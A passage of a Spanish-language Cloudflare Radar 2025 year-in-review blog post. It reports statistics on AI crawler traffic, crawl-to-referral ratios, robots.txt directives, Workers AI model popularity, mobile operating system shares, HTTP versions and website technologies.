          </figure><p><i><sup>Tendencias del tráfico del rastreador OpenAI en 2025, a nivel mundial</sup></i></p><p>El rastreo del ClaudeBot de Anthropic se duplicó de forma efectiva durante la primera mitad del año, pero disminuyó gradualmente durante la segunda mitad, volviendo a un nivel aproximadamente un 10 % superior al de principios de año. El tráfico de rastreo del PerplexityBot de Perplexity creció lentamente durante enero y febrero, pero experimentó un gran aumento en la actividad desde mediados de marzo hasta abril. Después de eso, el crecimiento fue más gradual hasta octubre, antes de experimentar un aumento significativo nuevamente en noviembre, terminando aproximadamente 3,5 veces por encima del nivel con el que había comenzado el año.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4PgjYaCVUzZgmt23SdKj6q/142ebab34ffbea6dd6770bcebdf2f1d2/BLOG-3077_21_-_image42.png" />
          </figure><p><i><sup>Tendencias de tráfico de ClaudeBot en 2025, a nivel mundial</sup></i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/hkDU4jX6T7GibKUxDqycO/c0eab7d698916d05ef7314973974ef5d/BLOG-3077_22_-_.png" />
          </figure><p><i><sup>Tendencias de tráfico de PerplexityBot en 2025, a nivel mundial</sup></i></p><p>Bytespider de ByteDance, uno de los principales rastreadores de IA de 2024, experimentó un volumen de rastreo inferior al de otros bots de entrenamiento, y su actividad disminuyó a lo largo del año, continuando el descenso observado el año pasado.</p>
    <div>
      <h3>El rastreo de la "acción del usuario" de la IA se multiplicó por más de 15 veces en 2025</h3>
      <a href="#el-rastreo-de-la-accion-del-usuario-de-la-ia-se-multiplico-por-mas-de-15-veces-en-2025">
        
      </a>
    </div>
    <p>La mayoría de los bots de IA rastrean con uno de estos tres <a href="https://radar.cloudflare.com/year-in-review/2025/#ai-crawler-traffic-by-purpose"><u>fines</u></a>: entrenamiento, que recopila contenido de sitios web para entrenar modelos de IA, búsqueda, que indexa contenido de sitios web para la funcionalidad de búsqueda disponible en plataformas de IA, y acción del usuario, que visita sitios web en respuesta a preguntas que los usuarios plantean a un bot de chat. Ten en cuenta que el rastreo de búsqueda también puede incluir el rastreo de <a href="https://developers.cloudflare.com/ai-search/concepts/what-is-rag/"><u>generación aumentada por recuperación (RAG)</u></a>, que permite a un propietario de contenido incorporar sus propios datos en la generación de un modelo de lenguaje de gran tamaño sin volver a entrenar o ajustar un modelo. (Un cuarto propósito "no declarado" captura el tráfico de bots de IA cuyo propósito de rastreo no está claro o se desconoce).</p><p>El rastreo para el entrenamiento de modelos es responsable de la gran mayoría del tráfico de rastreadores de la IA, alcanzando hasta 7-8 veces el rastreo de búsquedas y 32 veces el rastreo de acciones de los usuarios en los momentos de mayor actividad. La cifra de tráfico de entrenamiento está muy influenciada por GPTBot de OpenAI y, por lo tanto, siguió un patrón muy similar durante el año.</p><p>El rastreo para búsqueda fue más intenso hasta mediados de marzo, momento en que disminuyó aproximadamente un 40 %. Después volvió a un crecimiento más gradual, aunque al final del periodo analizado se situó algo menos de un 10 % por debajo del nivel registrado a principios de año.</p><p>El rastreo de acciones de usuario comenzó en 2025 con el volumen de rastreo más bajo de los tres propósitos definidos, pero se duplicó con creces entre enero y febrero. Volvió a duplicarse a principios de marzo y, a partir de ahí, continuó creciendo durante todo el año, multiplicándose por más de 21 desde enero hasta principios de diciembre. Este crecimiento se correlaciona estrechamente con las tendencias de tráfico observadas para el bot ChatGPT-User de OpenAI.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Cs9yjb8rpfwiOgfGmYGxx/7e11b9014a69b84af3b7b25cde4e73ac/BLOG-3077_23_-_ai-crawlpurpose-useraction.png" />
          </figure><p><i><sup>Tendencias del tráfico de los rastreadores de acciones de los usuarios en 2025, a nivel mundial</sup></i></p>
    <div>
      <h3>Mientras que otros bots de IA representaron el 4,2 % del tráfico de solicitudes HTML, Googlebot representó el 4,5 % por sí solo</h3>
      <a href="#mientras-que-otros-bots-de-ia-representaron-el-4-2-del-trafico-de-solicitudes-html-googlebot-represento-el-4-5-por-si-solo">
        
      </a>
    </div>
    <p>Los bots de IA han aparecido con frecuencia en las noticias durante 2025, a medida que los propietarios de contenido expresan su preocupación por la cantidad de tráfico que generan, especialmente porque gran parte de este <a href="https://blog.cloudflare.com/content-independence-day-no-ai-crawl-without-compensation/"><u>no se traduce en</u></a> que los usuarios finales sean redirigidos a los sitios web de origen. Para comprender mejor el impacto de la actividad de rastreo de los bots con IA, en comparación con los bots sin IA y el uso humano de la web, analizamos el tráfico de solicitudes de contenido HTML en toda la base de clientes de Cloudflare y <a href="https://radar.cloudflare.com/year-in-review/2025/#ai-traffic-share"><u>lo clasificamos</u></a> como procedente de un humano, un bot con IA u otro tipo de bot "sin IA". (Ten en cuenta que, dado que aquí nos centramos únicamente en el contenido HTML, las cuotas de tráfico del bot y de los usuarios humanos diferirán de las que se muestran en Radar, que analiza el tráfico de solicitudes para todos los tipos de contenido). Dado que Googlebot rastrea de forma tan activa y tiene un doble propósito, hemos desglosado su proporción por separado en este análisis.</p><p>A lo largo de 2025, descubrimos que el tráfico de bots de IA representó una media del 4,2 % de las solicitudes HTML. El porcentaje varió considerablemente a lo largo del año, disminuyendo hasta el 2,4 % a principios de abril y aumentando hasta el 6,4 % a finales de junio.</p><p>Con ese fin, los bots no basados en IA comenzaron 2025 siendo responsables de la mitad de las solicitudes a páginas HTML, siete puntos porcentuales por encima del tráfico generado por humanos. Esta diferencia aumentó hasta 25 puntos porcentuales durante los primeros días de junio. Sin embargo, estas cuotas de tráfico comenzaron a acercarse a partir de mediados de junio y, a partir del 11 de septiembre, entraron en un periodo en el que la cuota de tráfico HTML generada por humanos superó en ocasiones a la de los bots no basados en IA. A partir del 2 de diciembre, el tráfico humano generó el 47 % de las solicitudes HTML, y los bots que no son de IA generaron el 44 %.</p><p>Googlebot es un rastreador particularmente voraz y este año originó el 4,5 % de las solicitudes HTML, un porcentaje ligeramente superior al de los bots de IA en conjunto. Comenzó el año con algo menos del 2,5 %, pero su cuota aumentó rápidamente durante los siguientes cuatro meses, alcanzando un máximo del 11 % a finales de abril. Posteriormente, retrocedió hacia su punto de partida durante los meses siguientes y, a continuación, volvió a crecer durante la segunda mitad del año, finalizando con una cuota del 5 %. Este cambio en la cuota refleja en gran medida la actividad de rastreo de Googlebot, como se ha comentado anteriormente.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/69Kmxq3C29UO0AM7yWOJmY/411e1fe6e4799ae08cfdfec8783a8a71/BLOG-3077_24_-_ai-aibottrafficshare.png" />
          </figure><p><i><sup>Cuota de tráfico HTML por tipo de bot en 2025, a nivel mundial</sup></i></p>
    <div>
      <h3>Anthropic tuvo la proporción más alta de rastreo-referencia entre las principales plataformas de IA y búsqueda</h3>
      <a href="#anthropic-tuvo-la-proporcion-mas-alta-de-rastreo-referencia-entre-las-principales-plataformas-de-ia-y-busqueda">
        
      </a>
    </div>
    <p>Lanzamos la <a href="https://blog.cloudflare.com/ai-search-crawl-refer-ratio-on-radar/"><u>métrica de relación rastreo-referencia en Radar</u></a> el 1 de julio para rastrear la frecuencia con la que una determinada plataforma de IA o de búsqueda envía tráfico a un sitio en relación con la frecuencia con la que rastrea ese sitio. Una ratio alta significa que hay una gran cantidad de rastreo de IA sin enviar personas reales a un sitio web.</p><p>Puede ser una métrica volátil, con valores que varían día a día a medida que cambian la actividad de rastreo y el tráfico de referencia. Esta <a href="https://blog.cloudflare.com/ai-search-crawl-refer-ratio-on-radar/#how-does-this-measurement-work"><u>métrica compara</u></a> el número total de solicitudes de agentes de usuario relevantes asociados a una plataforma de búsqueda o de IA determinada donde la respuesta fue de Content-type: text/html por el número total de solicitudes de contenido HTML en las que el encabezado Referer contenía un nombre de host asociado a una plataforma de búsqueda o de IA determinada. </p><p>Anthropic tuvo las ratios de rastreo-referencia más altas de este año, alcanzando hasta 500 000:1, aunque fueron bastante irregulares entre enero y mayo. Tanto la magnitud como la naturaleza errática de la métrica se debieron probablemente al escaso tráfico de referencia durante ese periodo. Después de eso, las ratios se volvieron más consistentes, pero siguieron siendo más altas que otras, oscilando entre ~25 000:1 y ~100 000:1.</p><p>Las ratios de OpenAI a lo largo del tiempo fueron bastante irregulares y alcanzaron hasta 3700:1 en marzo. Estos cambios pueden deberse a la estabilidad de la actividad de rastreo de GPTBot, junto con un mayor uso de la funcionalidad de búsqueda de ChatGPT, que incluye enlaces a los sitios web de origen en sus respuestas. Los usuarios que sigan esos enlaces aumentarán los recuentos de referencia, lo que podría reducir la ratio. (Suponiendo que el tráfico de rastreo no aumentase a un ritmo similar o mayor).</p><p>Perplexity tuvo las ratios de rastreo-referencia más bajas de las principales plataformas de IA, comenzando el año por debajo de 100:1 antes de dispararse a finales de marzo por encima de 700:1, coincidiendo con un pico de tráfico de rastreo observado desde PerplexityBot. Tras el repunte, los valores máximos de la ratio se estabilizaron por debajo de 400:1 y, a partir de septiembre, por debajo de 200:1.</p><p>Entre las plataformas de búsqueda, la ratio de Microsoft mostró inesperadamente un patrón semanal cíclico, alcanzando sus niveles más bajos los jueves y alcanzando su punto máximo los domingos. Los valores máximos de la ratio se situaron generalmente entre 50:1 y 70:1 a lo largo del año. Comenzando el año con poco más de 3:1, la ratio entre rastreos y referencias de Google aumentó de manera constante hasta abril, alcanzando un máximo de 30:1. Tras alcanzar su punto máximo, descendió de forma algo errática hasta mediados de julio, retrocediendo a 3:1, aunque ha ido aumentando lentamente durante la segunda mitad de 2025. La ratio de DuckDuckGo se mantuvo por debajo de 1:1 durante los tres primeros trimestres de 2025, pero experimentó un aumento repentino a 1,5:1 a mediados de octubre y se mantuvo elevada durante el resto del periodo.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Z0LM4kJGevPxirhokT85o/401363b41b9f5987fe06976197967d9a/BLOG-3077_25_-_ai-crawltoreferratios.png" />
          </figure><p><i><sup>Ratios de rastreo-referencia de la IA y las plataformas de búsqueda en 2025, a nivel mundial</sup></i></p>
    <div>
      <h3>Los rastreadores de IA fueron los agentes de usuario a los que se les denegó totalmente el acceso con más frecuencia en los archivos robots.txt</h3>
      <a href="#los-rastreadores-de-ia-fueron-los-agentes-de-usuario-a-los-que-se-les-denego-totalmente-el-acceso-con-mas-frecuencia-en-los-archivos-robots-txt">
        
      </a>
    </div>
    <p>El archivo robots.txt, definido formalmente en el estándar <a href="https://www.rfc-editor.org/rfc/rfc9309.html"><u>RFC 9309</u></a> como el Protocolo de exclusión de robots, es un archivo de texto que los propietarios de contenido pueden utilizar para indicar a los rastreadores web a qué partes de un sitio web pueden acceder. Esto se realiza mediante directivas para permitir o denegar el acceso a los rastreadores de búsqueda y de IA a todo el sitio o solo a partes del mismo. Las directivas del archivo son, en efecto, una señal de "prohibido el paso" y no proporcionan ningún control de acceso formal. Dicho esto, la función <a href="https://blog.cloudflare.com/control-content-use-for-ai-training/#putting-up-a-guardrail-with-cloudflares-managed-robots-txt"><u>robots.txt administrado</u></a> de Cloudflare actualiza automáticamente el archivo robots.txt existente de un sitio o crea un archivo robots.txt en el sitio que incluye directivas que solicitan a los operadores de bots de IA más populares que no utilicen el contenido para el entrenamiento de modelos de IA. Además, nuestras funciones de <a href="https://blog.cloudflare.com/ai-audit-enforcing-robots-txt/"><u>AI Crawl Control</u></a> pueden rastrear las infracciones de las directivas robots.txt de un sitio, y dar al propietario del sitio la capacidad de bloquear las solicitudes del agente de usuario infractor.</p><p>En Cloudflare Radar, proporcionamos <a href="https://radar.cloudflare.com/ai-insights#ai-user-agents-found-in-robotstxt"><u>información</u></a> sobre la cantidad de archivos robots.txt que se encuentran entre nuestros 10 000 principales <a href="https://radar.cloudflare.com/domains"><u>dominios</u></a>, así como la disposición total o parcial de las directivas "allow" (permiso) y "disallow" (denegación) que se encuentran en los archivos para los agentes de usuario rastreadores seleccionados. (En este contexto, "total" se refiere a las directivas que se aplican a todo el sitio, y "parcial" se refiere a las directivas que se aplican a rutas o tipos de archivos específicos). En el micrositio del <a href="https://radar.cloudflare.com/year-in-review/2025/#robots-txt"><u>Resumen del año</u></a> mostramos cómo cambió la disposición de estas directivas a lo largo de 2025.</p><p>Los agentes de usuario con el mayor número de directivas totalmente no permitidas son los asociados a los rastreadores de IA, incluidos GPTBot, ClaudeBot y <a href="https://www.theatlantic.com/technology/2025/11/common-crawl-ai-training-data/684567/"><u>CCBot</u></a>. Las directivas para los rastreadores Googlebot y Bingbot, utilizados tanto para la indexación de búsquedas como para el entrenamiento de la IA, se orientaban principalmente a la denegación parcial, probablemente enfocadas en aislar los puntos finales de inicio de sesión y otras áreas no relacionadas con el contenido de un sitio. Para estos dos bots, las directivas aplicables a todo el sitio representaron una pequeña parte del número total de directivas de no permitir observadas durante el año. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6hCZ4jExApvVaK2CrEulZO/5eb528b8851868d0c90b56e638ffae86/BLOG-3077_26_-_ai-robotstxt-disallow.png" />
          </figure><p><i><sup>Directivas de no permitir de Robots.txt por agente de usuario</sup></i></p><p>El número de directivas explícitas "allow" encontradas en los archivos robots.txt descubiertos era una pequeña parte de las directivas "disallow" observadas, probablemente porque "allow" es la política predeterminada, en ausencia de cualquier directiva específica. Googlebot tenía el mayor número de directivas "allow" explícitas, aunque más de la mitad de ellas eran permisos parciales. Se encontraron directivas "allow" dirigidas a rastreadores de IA en menos dominios, y directivas dirigidas a los rastreadores de OpenAI que se inclinan más hacia permisos explícitos totales. </p><p><a href="https://developers.google.com/crawling/docs/crawlers-fetchers/google-common-crawlers#google-extended"><u>Google-Extended</u></a> es un token de agente de usuario que los editores web pueden utilizar para gestionar si el contenido que Google rastrea de sus sitios se puede utilizar para entrenar <a href="https://deepmind.google/models/gemini/"><u>modelos Gemini</u></a> o para proporcionar contenido del sitio desde el índice de Búsqueda de Google a Gemini. El número de directivas de permiso dirigidas a este token se triplicó durante el año. La mayoría permitía el acceso parcial a principios de año, mientras que a finales de año se observó un mayor número de directivas que permitían explícitamente el acceso total al sitio en comparación con aquellas que solo permitían el acceso a una parte del contenido del sitio. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6hCZ4jExApvVaK2CrEulZO/5eb528b8851868d0c90b56e638ffae86/BLOG-3077_26_-_ai-robotstxt-disallow.png" />
          </figure><p><i><sup>Directivas 'allow' de Robots.txt por agente de usuario</sup></i></p>
    <div>
      <h3>En Workers AI, el modelo llama-3-8b-instruct de Meta fue el modelo más popular, y la generación de texto fue el tipo de tarea más frecuente</h3>
      <a href="#en-workers-ai-el-modelo-llama-3-8b-instruct-de-meta-fue-el-modelo-mas-popular-y-la-generacion-de-texto-fue-el-tipo-de-tarea-mas-frecuente">
        
      </a>
    </div>
    <p>El panorama de los modelos de IA está evolucionando rápidamente, y los proveedores lanzan periódicamente modelos más potentes, capaces de realizar tareas como la generación de texto e imágenes, el reconocimiento de voz y la clasificación de imágenes. Cloudflare trabaja estrechamente con los proveedores de modelos de IA para garantizar <a href="https://developers.cloudflare.com/workers-ai/models/"><u>la compatibilidad de Workers AI con estos modelos</u></a> lo antes posible tras su lanzamiento, y <a href="https://blog.cloudflare.com/replicate-joins-cloudflare/"><u>recientemente hemos adquirido Replicate</u></a> para ampliar considerablemente nuestro catálogo de modelos compatibles. En <a href="https://blog.cloudflare.com/expanded-ai-insights-on-cloudflare-radar/#popularity-of-models-and-tasks-on-workers-ai"><u>febrero de 2025</u></a>, incorporamos en Radar visibilidad sobre la popularidad de los <a href="https://radar.cloudflare.com/ai-insights/#workers-ai-model-popularity"><u>modelos</u></a> compatibles disponibles públicamente, así como los tipos de <a href="https://radar.cloudflare.com/ai-insights/#workers-ai-task-popularity"><u>tareas</u></a> que realizan estos modelos, en función del porcentaje de cuentas de los clientes. </p><p><a href="https://radar.cloudflare.com/year-in-review/2025/#workers-ai-model-and-task-popularity"><u>A lo largo del año</u></a>, el modelo <a href="https://developers.cloudflare.com/workers-ai/models/llama-3-8b-instruct/"><u>llama-3-8b-instruct</u></a> de Meta fue dominante, con una cuota de cuentas (36,3 %) más de tres veces superior a la de los siguientes modelos más populares, <a href="https://developers.cloudflare.com/workers-ai/models/whisper/"><u>whisper</u></a> de OpenAI (10,1 %) y <a href="https://developers.cloudflare.com/workers-ai/models/stable-diffusion-xl-base-1.0/"><u>stable-diffusion-xl-base-1.0</u></a> de Stability AI (9,8 %). Tanto Meta como la Academia de Inteligencia Artificial de Pekín (BAAI) tenían varios modelos entre los 10 primeros, y los 10 modelos principales tenían una cuota del 89 %, mientras que el resto se repartía entre una larga lista de otros modelos.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1a3GPm3cqrr0KcK6nCeLRZ/fd5ba576f02518c50fd6efbe312cacae/BLOG-3077_28_-_ai-workersaimostpopularmodels.png" />
          </figure><p><i><sup>Modelos más populares en Workers AI en 2025, a nivel mundial</sup></i></p><p>La popularidad de las tareas se vio impulsada en gran medida por los modelos más destacados. La generación de texto, la conversión de texto a imagen y el reconocimiento automático de voz encabezaron la lista. La generación de texto fue utilizada por el 48,2 % de las cuentas de clientes de Workers AI, casi cuatro veces más que el porcentaje de texto a imagen, que fue del 12,3 %, y el porcentaje de reconocimiento automático de voz, que fue del 11,0 %. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3JxZW6bB7q0kxnzPrh454m/b057fd945ce521aceaf0e8cd27b14f3d/BLOG-3077_29_-_ai-workersaimostpopulartasks.png" />
          </figure><p><i><sup>Tareas más populares en Workers AI en 2025, a nivel mundial</sup></i></p>
    <div>
      <h2>Qué se está rastreando</h2>
      <a href="#que-se-esta-rastreando">
        
      </a>
    </div>
    <p>Además del análisis anual presentado anteriormente, a continuación se muestran análisis puntuales de lo que se está rastreando. Ten en cuenta que estos datos no se incluyen en el micrositio del Resumen del año.</p>
    <div>
      <h3>Indexación por región geográfica</h3>
      <a href="#indexacion-por-region-geografica">
        
      </a>
    </div>
    <p>En la sección de IA del informe, analizamos el tráfico global de bots y rastreadores de IA, independientemente de la ubicación geográfica asociada a la cuenta propietaria del contenido rastreado. Si analizamos más detalladamente los datos geográficos de octubre de 2025 y observamos qué bots generan más tráfico de rastreo para los sitios web de clientes con una dirección de facturación en una región geográfica determinada, vemos que Googlebot representa entre el 35 % y el 55 % del tráfico de rastreo en cada región.</p><p>GPTBot de OpenAI o Bingbot de Microsoft son los segundos más activos, con porcentajes de rastreo del 13-14 %. En las economías desarrolladas de Norteamérica, Europa y Oceanía, Bingbot mantiene una clara ventaja sobre los rastreadores de IA. Sin embargo, para los sitios web ubicados en mercados de rápido crecimiento en Sudamérica y Asia, GPTBot aventaja ligeramente a Bingbot.</p><table><tr><th><p><b>Región geográfica</b></p></th><th><p><b>Rastreadores principales</b></p></th></tr><tr><td><p>Norteamérica</p></td><td><p>Googlebot (45,5 %)
Bingbot (14 %)</p><p>Meta-ExternalAgent (7,7 %)</p></td></tr><tr><td><p>Sudamérica</p></td><td><p>Googlebot (44,2 %)
GPTBot (13,8 %)
Bingbot (13,5 %)</p></td></tr><tr><td><p>Europa</p></td><td><p>Googlebot (48,6%)
Bingbot (13,2 %)
GPTBot (10,8 %)</p></td></tr><tr><td><p>Asia</p></td><td><p>Googlebot (39 %)
GPTBot (14 %)
Bingbot (12,6 %)</p></td></tr><tr><td><p>África</p></td><td><p>Googlebot (35,8 %)
Bingbot (13,7 %)
GPTBot (13,1 %)</p></td></tr><tr><td><p>Oceanía</p></td><td><p>Googlebot (54,2 %)
Bingbot (13,8 %)
GPTBot (6,6 %)</p></td></tr></table>
    <div>
      <h3>Rastreo por sector</h3>
      <a href="#rastreo-por-sector">
        
      </a>
    </div>
    <p>Tras analizar la actividad de los rastreadores de IA por sector de clientes durante octubre de 2025, descubrimos que los sectores de comercio minorista y software informático fueron los que atrajeron sistemáticamente la mayor parte del tráfico de rastreadores de IA, representando en conjunto algo más del 40 % de toda la actividad.</p><p>Otros que ocuparon las diez primeras posiciones representaron proporciones mucho menores de la actividad de rastreo. Estos 10 principales sectores representaron algo menos del 70 % del rastreo, y el resto se distribuyó entre una larga lista de otros sectores.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2N55U6SrN7zKkCp66hmhFz/304b038e492e4eda249f3b1fdb664b4a/BLOG-3077_30_-_AI-crawlbyindustry.png" />
          </figure><p><i><sup>Cuota de la actividad de rastreo de IA en el sector, octubre de 2025</sup></i></p>
    <div>
      <h2>Adopción y uso</h2>
      <a href="#adopcion-y-uso">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/73LdMVjBBlMOnQGi8LF4oy/f659eaf5d95219e5b54d62b9e16db809/BLOG-3077_31_-_image35.png" />
          </figure>
    <div>
      <h3>Los dispositivos iOS generaron el 35 % del tráfico de dispositivos móviles a nivel mundial, y más de la mitad del tráfico de dispositivos en muchos países</h3>
      <a href="#los-dispositivos-ios-generaron-el-35-del-trafico-de-dispositivos-moviles-a-nivel-mundial-y-mas-de-la-mitad-del-trafico-de-dispositivos-en-muchos-paises">
        
      </a>
    </div>
    <p>Los dos principales sistemas operativos para dispositivos móviles a nivel mundial son <a href="https://en.wikipedia.org/wiki/IOS"><u>iOS de Apple</u></a> y <a href="https://en.wikipedia.org/wiki/Android_(operating_system)"><u>Android de Google</u></a>. Tras analizar la información en el encabezado <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent"><u>User-Agent</u></a> incluido en cada solicitud web, podemos calcular la distribución del tráfico por sistema operativo del cliente a lo largo del año. Los dispositivos Android generan la mayor parte del tráfico de dispositivos móviles a nivel mundial, debido a la amplia distribución de precios, formatos y capacidades de dichos dispositivos.</p><p>A nivel mundial, la <a href="https://radar.cloudflare.com/year-in-review/2025/#ios-vs-android"><u>cuota de tráfico procedente de iOS</u></a> aumentó ligeramente <a href="https://blog.cloudflare.com/radar-2024-year-in-review/#globally-nearly-one-third-of-mobile-device-traffic-was-from-apple-ios-devices-android-had-a-90-share-of-mobile-device-traffic-in-29-countries-regions-peak-ios-mobile-device-traffic-share-was-over-60-in-eight-countries-regions"><u>en términos interanuales</u></a>, en concreto dos puntos porcentuales hasta el 35 % en 2025. Si nos fijamos en los países con mayor cuota de tráfico iOS, <a href="https://radar.cloudflare.com/year-in-review/2025/mc#ios-vs-android"><u>Mónaco</u></a> ocupaba el primer puesto, con un 70 %, e iOS generaba el 50 % o más del tráfico de dispositivos móviles en un total de 30 países / regiones, entre ellos <a href="https://radar.cloudflare.com/year-in-review/2025/dk#ios-vs-android"><u>Dinamarca</u></a> (65 %), <a href="https://radar.cloudflare.com/year-in-review/2025/jp#ios-vs-android"><u>Japón</u></a> (57 %) y <a href="https://radar.cloudflare.com/year-in-review/2025/pr#ios-vs-android"><u>Puerto Rico</u></a> (52 %).</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/btCnb93d23FUPVfkupEGb/79574bfd6f045f88d6331caf488f37a5/BLOG-3077_32_-_adoption-iosvsandroid.png" />
          </figure><p><i><sup>Distribución del tráfico de dispositivos móviles por sistema operativo en 2025, a nivel mundial</sup></i></p><p>En los países o regiones con mayor uso de Android, las cuotas fueron significativamente mayores. Veintisiete países registraron una adopción de Android superior al 90 % en 2025, siendo <a href="https://radar.cloudflare.com/year-in-review/2025/pg#ios-vs-android"><u>Papúa Nueva Guinea</u></a> el país con la cuota más alta del 97 %. <a href="https://radar.cloudflare.com/year-in-review/2025/sd#ios-vs-android"><u>Sudán</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/mw#ios-vs-android"><u>Malawi</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/bd#ios-vs-android"><u>Bangladés</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025/et#ios-vs-android"><u>Etiopía</u></a> también registraron una cuota de Android del 95 % o más. Android fue responsable del 50 % o más del tráfico de dispositivos móviles en 175 países / regiones, siendo las <a href="https://radar.cloudflare.com/year-in-review/2025/bs#ios-vs-android"><u>Bahamas</u></a>, con un porcentaje del 51 %, el país con la cuota más baja de la lista. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2SAm11BSUjgT2uBOfMT4dU/67d85c4786bb8bfe924f92f28956e5b6/BLOG-3077_33_-_adoption-iosvsandroid-map.png" />
          </figure><p><i><sup>Distribución del uso de iOS y Android en 2025</sup></i></p>
    <div>
      <h3>El porcentaje de solicitudes web globales que utilizan HTTP/3 y HTTP/2 aumentó ligeramente en 2025</h3>
      <a href="#el-porcentaje-de-solicitudes-web-globales-que-utilizan-http-3-y-http-2-aumento-ligeramente-en-2025">
        
      </a>
    </div>
    <p>HTTP (protocolo de transferencia de hipertexto) es el protocolo que hace que la web funcione. En los últimos 30 años, ha experimentado varias revisiones importantes. La primera versión estandarizada, <a href="https://datatracker.ietf.org/doc/html/rfc1945"><u>HTTP/1.0</u></a>, se adoptó en 1996, <a href="https://www.rfc-editor.org/rfc/rfc2616.html"><u>HTTP/1.1</u></a> en 1999 y <a href="https://www.rfc-editor.org/rfc/rfc7540.html"><u>HTTP/2</u></a> en 2015. <a href="https://www.rfc-editor.org/rfc/rfc9114.html"><u>HTTP/3</u></a>, estandarizado en 2022, supuso una importante actualización, ya que se ejecuta sobre un nuevo protocolo de transporte conocido como <a href="https://blog.cloudflare.com/the-road-to-quic/"><u>QUIC</u></a>. El uso de QUIC como su transporte subyacente permite que <a href="https://www.cloudflare.com/learning/performance/what-is-http3/"><u>HTTP/3</u></a> establezca conexiones más rápidamente, además de ofrecer un rendimiento mejorado al mitigar los efectos de la pérdida de paquetes y los cambios en la red. Dado que también proporciona cifrado de forma predeterminada, el uso de HTTP/3 mitiga el riesgo de ataques. </p><p><a href="https://radar.cloudflare.com/year-in-review/2025/#http-versions"><u>A nivel mundial en 2025</u></a>, el 50 % de las solicitudes a Cloudflare se realizaron a través de HTTP/2 y HTTP/1.x. Representaron el 29 %, y el 21 % restante se realizaron a través de HTTP/3. Estas cuotas se han mantenido prácticamente sin cambios <a href="https://radar.cloudflare.com/year-in-review/2024#http-versions"><u>desde 2024</u></a>: HTTP/2 y HTTP/3 solo han ganado unas décimas de punto porcentual este año.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1GdxQoS6Zgx6IPgHapkS8N/07d2d023e2e91f58793e7b4359faa263/BLOG-3077_34_-_adoption-httpversions.png" />
          </figure><p><i><sup>Distribución del tráfico por versión de HTTP en 2025, a nivel mundial</sup></i></p><p>Geográficamente, el uso de HTTP/3 parece estar aumentando y extendiéndose. El año pasado, observamos que habíamos encontrado ocho países / regiones que enviaban más de un tercio de sus solicitudes a través de HTTP/3. En 2025, 15 países / regiones enviaron más de un tercio de las solicitudes a través de HTTP/3. La adopción en Georgia, con un 38 %, superó por poco la tasa máxima de adopción de 2024 del 37% registrada en Reunión. (Si observamos los <a href="https://radar.cloudflare.com/adoption-and-usage/ge?dateStart=2025-01-01&amp;dateEnd=2025-12-02"><u>datos históricos</u></a>, Georgia <a href="https://radar.cloudflare.com/adoption-and-usage/ge?dateStart=2025-01-01&amp;dateEnd=2025-01-07"><u>comenzó el año</u></a> con una adopción de HTTP/3 de alrededor del 46 %, pero disminuyó durante la primera mitad del año antes de estabilizarse). Armenia experimentó el mayor aumento en la adopción de HTTP/3 interanual, con un incremento del 25 % al 37 %. </p><p>Siete países / regiones registraron niveles generales de uso de HTTP/3 inferiores al 10 % debido a los altos niveles de tráfico HTTP/1.x originado por bots. Entre ellos se incluyen Hong Kong, Dominica, Singapur, Irlanda, Irán, Seychelles y Gibraltar. </p>
    <div>
      <h3>Las bibliotecas y los marcos basados en JavaScript siguen siendo herramientas fundamentales para la creación de sitios web</h3>
      <a href="#las-bibliotecas-y-los-marcos-basados-en-javascript-siguen-siendo-herramientas-fundamentales-para-la-creacion-de-sitios-web">
        
      </a>
    </div>
    <p>Para ofrecer un sitio web moderno, los desarrolladores deben integrar de forma eficiente una creciente colección de bibliotecas y marcos con herramientas y plataformas de terceros. Todos estos componentes deben funcionar en conjunto para garantizar experiencias de usuario eficaces, con numerosas funciones y sin problemas. Como en años anteriores, utilizamos <a href="https://radar.cloudflare.com/scan"><u>URL Scanner de Cloudflare Radar</u></a> para analizar los sitios web asociados con los <a href="https://radar.cloudflare.com/domains"><u>5000 dominios principales</u></a> para identificar las <a href="https://radar.cloudflare.com/year-in-review/2025/#website-technologies"><u>tecnologías y los servicios más populares</u></a> utilizados en once categorías. </p><p><a href="https://jquery.com/"><u>jQuery</u></a> se describe a sí misma como una biblioteca JavaScript rápida, pequeña y con muchas funciones. Nuestro análisis reveló que se encuentra en 8 veces más sitios que <a href="https://kenwheeler.github.io/slick/"><u>Slick,</u></a> una biblioteca JavaScript que se utiliza para mostrar carruseles de imágenes. <a href="https://react.dev/"><u>React</u></a> siguió siendo el principal marco de JavaScript utilizado para crear interfaces web, presente en el doble de sitios analizados que <a href="https://vuejs.org/"><u>Vue.js</u></a>. PHP, Node.js y Java siguieron siendo los lenguajes / tecnologías de programación más populares, manteniendo una clara ventaja sobre otros lenguajes como Ruby, Python, Perl y C.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/QBZ6xnDPw9i3y7EBhTqsd/f232925caf1cf3caa91e80a4e16d5ba8/BLOG-3077_35_-_adoption-websitetechnologies.png" />
